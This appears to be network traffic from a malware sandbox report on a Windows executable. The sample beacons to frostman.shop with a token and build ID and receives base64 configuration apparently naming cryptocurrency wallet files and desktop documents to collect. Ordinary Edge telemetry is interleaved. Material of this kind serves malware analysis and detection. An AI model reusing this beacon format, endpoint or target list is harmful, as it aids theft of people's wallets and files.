                                                                                                                                                                                                                                                                              2024-12-20 06:31:53 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:53 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:53 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:53 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:53 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:53 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:53 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:32:01 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:32:00 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              35192.168.2.749924116.203.12.1144436960C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:54 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----BA168GLN7QIEUAAIWBI5
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Content-Length: 331
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:31:54 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 42 41 31 36 38 47 4c 4e 37 51 49 45 55 41 41 49 57 42 49 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 42 41 31 36 38 47 4c 4e 37 51 49 45 55 41 41 49 57 42 49 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 42 41 31 36 38 47 4c 4e 37 51 49 45 55 41 41 49 57 42 49 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: ------BA168GLN7QIEUAAIWBI5Content-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------BA168GLN7QIEUAAIWBI5Content-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------BA168GLN7QIEUAAIWBI5Cont
                                                                                                                                                                                                                                                                              2024-12-20 06:31:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:55 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              2024-12-20 06:31:55 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                                              Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              36192.168.2.749936116.203.12.1144436960C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:57 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----Z5FKN7900ZUAAASJWL6P
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Content-Length: 331
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:31:57 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 5a 35 46 4b 4e 37 39 30 30 5a 55 41 41 41 53 4a 57 4c 36 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 5a 35 46 4b 4e 37 39 30 30 5a 55 41 41 41 53 4a 57 4c 36 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 5a 35 46 4b 4e 37 39 30 30 5a 55 41 41 41 53 4a 57 4c 36 50 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: ------Z5FKN7900ZUAAASJWL6PContent-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------Z5FKN7900ZUAAASJWL6PContent-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------Z5FKN7900ZUAAASJWL6PCont
                                                                                                                                                                                                                                                                              2024-12-20 06:31:58 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:57 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              2024-12-20 06:31:58 UTC143INData Raw: 38 34 0d 0a 52 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 4c 43 77 71 4c 6d 52 76 59 79 77 71 4c 6d 70 77 5a 33 77 78 4e 54 42 38 4d 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 52 47 56 6d 59 58 56 73 64 48 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 52 38 4d 54 55 77 66 44 46 38 4b 6e 64 70 62 6d 52 76 64 33 4d 71 66 41 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                              Data Ascii: 84RGVza3RvcHwlREVTS1RPUCVcfCoudHh0LCwqLmRvYywqLmpwZ3wxNTB8MXwqd2luZG93cyp8RGVmYXVsdHwlRE9DVU1FTlRTJVx8Ki50eHR8MTUwfDF8KndpbmRvd3MqfA==0


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              37192.168.2.74993420.42.65.904431552C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:57 UTC1044OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734680552182&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                              Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              Content-Length: 11828
                                                                                                                                                                                                                                                                              sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                              Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                              Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                              Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                              Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                              Cookie: USRLOC=; MUID=2FB26BEE4D14683625707EB54C6669DF; _EDGE_S=F=1&SID=145EA6F856B060B31CAAB3A3577061E4; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                                                                                                                              2024-12-20 06:31:57 UTC11828OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 30 54 30 37 3a 34 32 3a 33 32 2e 31 38 30 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 63 33 65 65 30 37 66 33 2d 36 36 65 61 2d 34 36 31 37 2d 61 38 35 64 2d 66 30 30 63 32 30 38 37 61 37 31 64 22 2c 22 65 70 6f 63 68 22 3a 22 31 33 30 39 31 34 36 38 38 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                              Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-20T07:42:32.180Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"c3ee07f3-66ea-4617-a85d-f00c2087a71d","epoch":"1309146888"},"app":{"locale
                                                                                                                                                                                                                                                                              2024-12-20 06:31:57 UTC894INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                              P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                              Set-Cookie: MC1=GUID=6e35ea1915194f60827c787c250b6614&HASH=6e35&LV=202412&V=4&LU=1734676317548; Domain=.microsoft.com; Expires=Sat, 20 Dec 2025 06:31:57 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                              Set-Cookie: MS0=16e9e5da6fc54ba1a23c96dc13249946; Domain=.microsoft.com; Expires=Fri, 20 Dec 2024 07:01:57 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                              time-delta-millis: -4234634
                                                                                                                                                                                                                                                                              Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                              Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:56 GMT
                                                                                                                                                                                                                                                                              Connection: close


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              38192.168.2.74993520.42.65.904431552C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:57 UTC1043OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734680552185&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                              Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              Content-Length: 5150
                                                                                                                                                                                                                                                                              sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                              Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                              Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                              Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                              Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                              Cookie: USRLOC=; MUID=2FB26BEE4D14683625707EB54C6669DF; _EDGE_S=F=1&SID=145EA6F856B060B31CAAB3A3577061E4; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                                                                                                                              2024-12-20 06:31:57 UTC5150OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 30 54 30 37 3a 34 32 3a 33 32 2e 31 38 35 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 63 33 65 65 30 37 66 33 2d 36 36 65 61 2d 34 36 31 37 2d 61 38 35 64 2d 66 30 30 63 32 30 38 37 61 37 31 64 22 2c 22 65 70 6f 63 68 22 3a 22 31 33 30 39 31 34 36 38 38 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
